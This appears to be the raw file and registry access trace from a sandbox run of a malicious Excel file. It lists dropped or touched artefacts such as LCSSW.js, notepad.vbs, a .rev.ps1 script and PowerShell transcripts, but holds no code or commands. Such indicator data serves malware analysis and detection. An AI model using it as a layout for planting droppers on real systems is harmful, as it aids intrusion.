C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tools\tools.psm1
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tools\tools.cdxml
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tools\tools.xaml
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tools\tools.ni.dll
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tools\tools.dll
C:\Program Files\WindowsPowerShell\Modules
C:\Program Files\WindowsPowerShell\Modules\*
C:\Program Files\WindowsPowerShell\Modules\Modules.psd1
C:\Program Files\WindowsPowerShell\Modules\Modules.psm1
C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml
C:\Program Files\WindowsPowerShell\Modules\Modules.xaml
C:\Program Files\WindowsPowerShell\Modules\Modules.ni.dll
C:\Program Files\WindowsPowerShell\Modules\Modules.dll
C:\Program Files\WindowsPowerShell\Modules\PackageManagement
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\*
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\*
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll
C:\Windows\System32\WindowsPowerShell\v1.0\Modules
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\*
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.psm1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.cdxml
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.xaml
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.ni.dll
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.dll
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppLocker
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\CimCmdlets
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ISE
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDiagnostics
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSScheduledJob
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\*
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll
C:\ProgramData\Boxstarter\Microsoft.PowerShell.Commands.Utility
C:\ProgramData\Boxstarter\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll
C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility
C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\93a2e392ba379db038d1a507c1491ba3\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\93a2e392ba379db038d1a507c1491ba3\Microsoft.PowerShell.Commands.Utility.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\4f83b31ca1970081748ea8cc5e733200\System.Configuration.Install.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\4f83b31ca1970081748ea8cc5e733200\System.Configuration.Install.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Users\user\AppData\Local\Temp\notepad.vbs
C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Boxstarter.Bootstrapper.psd1
C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\boxstarter.chocolatey.psm1
C:\ProgramData\Boxstarter\Boxstarter.WinConfig\boxstarter.WinConfig.psm1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psm1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1
C:\ProgramData\Boxstarter\Boxstarter.HyperV\boxstarter.HyperV.psm1
C:\ProgramData\Boxstarter\Boxstarter.Common\boxstarter.common.psm1
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.psd1
C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\boxstarter.bootstrapper.psm1
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb
C:\Windows\symbols\dll\System.Management.Automation.pdb
C:\Windows\dll\System.Management.Automation.pdb
C:\Windows\System.Management.Automation.pdb
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb
C:\Windows\symbols\dll\System.Core.pdb
C:\Windows\dll\System.Core.pdb
C:\Windows\System.Core.pdb
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb
C:\Windows\symbols\dll\System.pdb
C:\Windows\dll\System.pdb
C:\Windows\System.pdb
C:\Python38\Scripts\start-process.*
C:\Python38\start-process.*
C:\Program Files\Common Files\Oracle\Java\javapath\start-process.*
C:\ProgramData\Boxstarter\start-process.*
C:\Windows\System32\start-process.*
C:\Windows\start-process.*
C:\Windows\System32\wbem\start-process.*
C:\Windows\System32\WindowsPowerShell\v1.0\start-process.*
C:\ProgramData\chocolatey\bin\start-process.*
C:\Program Files\dotnet\start-process.*
C:\Program Files\Microsoft Office\root\Client\start-process.*
C:\ProgramData\Boxstarter\Boxstarter.Common
C:\ProgramData\Boxstarter\Boxstarter.HyperV
C:\ProgramData\Boxstarter\Boxstarter.WinConfig
C:\ProgramData\Boxstarter\BuildPackages
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\*
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll
C:\ProgramData\Boxstarter\Microsoft.PowerShell.Commands.Management
C:\ProgramData\Boxstarter\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll
C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management
C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\73395fe20a6546d133e57eefc2347a2d\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\73395fe20a6546d133e57eefc2347a2d\Microsoft.PowerShell.Commands.Management.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.Services\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.Services.dll
C:\Users\user\AppData\Local\Temp\notepad.vbs.*
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.PowerShell.Commands.Management.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll
C:\Windows\Microsoft.Net\assembly\GAC\Microsoft.PowerShell.Commands.Management.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll
C:\Windows\assembly\GAC_32\Microsoft.PowerShell.Commands.Management.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll
C:\Windows\assembly\GAC\Microsoft.PowerShell.Commands.Management.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Commands.Management.resources.dll
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Commands.Management.resources\Microsoft.PowerShell.Commands.Management.resources.dll
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Commands.Management.resources.exe
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Commands.Management.resources\Microsoft.PowerShell.Commands.Management.resources.exe
C:\Users\user\AppData\Roaming\LCSSW.js\*
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe.Config
C:\Program Files\Common Files
C:\Program Files\Common Files\Microsoft Shared
C:\Program Files\Common Files\Microsoft Shared\ClickToRun
C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20251208-1633.log
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe.3.Manifest
C:\Users\user\AppData\Local\Temp\*
C:\Users\user\AppData\Local\Temp\WPF
C:\Users\user\AppData\Local\Temp\WPF\*
C:\Users\user\AppData\Local\Temp\WPDNSE
C:\Users\user\AppData\Local\Temp\WPDNSE\*
C:\Users\user\AppData\Local\Temp\mozilla-temp-files
C:\Users\user\AppData\Local\Temp\mozilla-temp-files\*
C:\Users\user\AppData\Local\Temp\hsperfdata_user
C:\Users\user\AppData\Local\Temp\hsperfdata_user\*
C:\Users\user\AppData\Local\Temp\chrome_BITS_336_972689310
C:\Users\user\AppData\Local\Temp\chrome_BITS_336_972689310\*
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\*
C:\Users\user\AppData\Local\Temp\acrord32_sbx
C:\Users\user\AppData\Local\Temp\acrord32_sbx\*
C:\Users\user\AppData\Local\Temp\A37256E2-2525-40A3-B592-D7B907DCE716
C:\Users\user\AppData\Local\Temp\A37256E2-2525-40A3-B592-D7B907DCE716\*
C:\Users\user\AppData\Local\Temp\6F160644-BCEC-4A1A-902F-D0CCEFCDB936
C:\Users\user\AppData\Local\Temp\6F160644-BCEC-4A1A-902F-D0CCEFCDB936\*
C:\Users\user\AppData\Local\Temp\23D16385-70FD-4CE7-90E1-580DE29E48A8
C:\Users\user\AppData\Local\Temp\23D16385-70FD-4CE7-90E1-580DE29E48A8\*
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\*
C:\Users\user\AppData\Local\Temp\A37256E2-2525-40A3-B592-D7B907DCE716\en-US
C:\Users\user\AppData\Local\Temp\A37256E2-2525-40A3-B592-D7B907DCE716\en-US\*
C:\Users\user\AppData\Local\Temp\6F160644-BCEC-4A1A-902F-D0CCEFCDB936\en-US
C:\Users\user\AppData\Local\Temp\6F160644-BCEC-4A1A-902F-D0CCEFCDB936\en-US\*
C:\Users\user\AppData\Local\Temp\23D16385-70FD-4CE7-90E1-580DE29E48A8\en-US
C:\Users\user\AppData\Local\Temp\23D16385-70FD-4CE7-90E1-580DE29E48A8\en-US\*
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\*
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\*
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\SearchEmbdIndex
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\SearchEmbdIndex\*
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\WPF\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\WPDNSE\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\mozilla-temp-files\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\hsperfdata_user\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\chrome_BITS_336_972689310\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\acrord32_sbx\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\A37256E2-2525-40A3-B592-D7B907DCE716\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\6F160644-BCEC-4A1A-902F-D0CCEFCDB936\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\23D16385-70FD-4CE7-90E1-580DE29E48A8\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\A37256E2-2525-40A3-B592-D7B907DCE716\en-US\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\6F160644-BCEC-4A1A-902F-D0CCEFCDB936\en-US\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\23D16385-70FD-4CE7-90E1-580DE29E48A8\en-US\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\SearchEmbdIndex\USERDUM-NNN0BL9*.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20221115-1711.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20221129-1614.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20221129-1709.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20221129-1715.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20221206-1120.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20230208-1109.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20230221-1320.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20240805-2157.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20240805-2158.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20240805-2204.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20240805-2211.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20240805-2211a.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20240805-2221.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20240805-2221a.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20240805-2221b.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20240805-2221c.log
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20251205-0647.log
C:\Users\user\AppData\Local\Temp\{A10036B2-3394-42E4-84B5-CED1890283B7} - OProcSessId.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
C:\Users\user\AppData\Local\Temp\72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls
C:\Users\user\AppData\Local\Temp\~DF8C8F9FEEB848381B.TMP
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6300C71B.emf
C:\Users\user\AppData\Local\Temp\~DF0D16C1186A1654C4.TMP
C:\Users\user\AppData\Local\Temp\~DFD8375274759C4F6D.TMP
C:\Users\user\AppData\Local\Temp\LCSSW.txt
C:\Users\user\AppData\Roaming\LCSSW.txt
C:\Users\user\AppData\Roaming\LCSSW.js
C:\Users\user\AppData\Local\Temp\2k4ha12y.rev.ps1
C:\Users\user\AppData\Local\Temp\0ro50elk.i5p.psm1
C:\PSTranscripts\20251208\PowerShell_transcript.USERDUM-NNN0BL9.awDK_ja3.20251208163520.txt
C:\Users\user\AppData\Local\Temp\notepad.vbs
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20251208-1633.log
C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
C:\Users\user\AppData\Local\Temp\Excel8.0\MSComctlLib.exd
C:\Users\user\AppData\Roaming\LCSSW.txt
C:\Users\user\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml
C:\Users\user\AppData\Local\Temp\2k4ha12y.rev.ps1
C:\Users\user\AppData\Local\Temp\0ro50elk.i5p.psm1
C:\Users\user\AppData\Local\Temp\notepad.vbs
C:\Users\user\AppData\Roaming\LCSSW.js
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\CMF\Config
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\Software\Microsoft\ClickToRun\OverRide
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\PackageFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\SoftGrid\4.5\Client\AppFS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV\c:\program files\microsoft office
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppV\Subsystem\Disabled
HKEY_LOCAL_MACHINE\
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\AppV\Subsystem\VirtualRegistry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\AppV\Subsystem\VirtualRegistry\PassThroughPaths
HKEY_LOCAL_MACHINE\SYSTEM\SELECT
HKEY_LOCAL_MACHINE\SYSTEM\Select\Current
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppV\Subsystem\ComExclusions
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV\Virtualized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excel.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\AvoidLargeAddresses
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office Test\Special\Perf
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Microsoft\Office
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office
HKEY_LOCAL_MACHINE\Software\Microsoft\Office
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\QMEnable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\LabMachine
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\CountryCode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\IsProviderIdFetchedFromLicensedName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Common\ExperimentDogfood
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Common
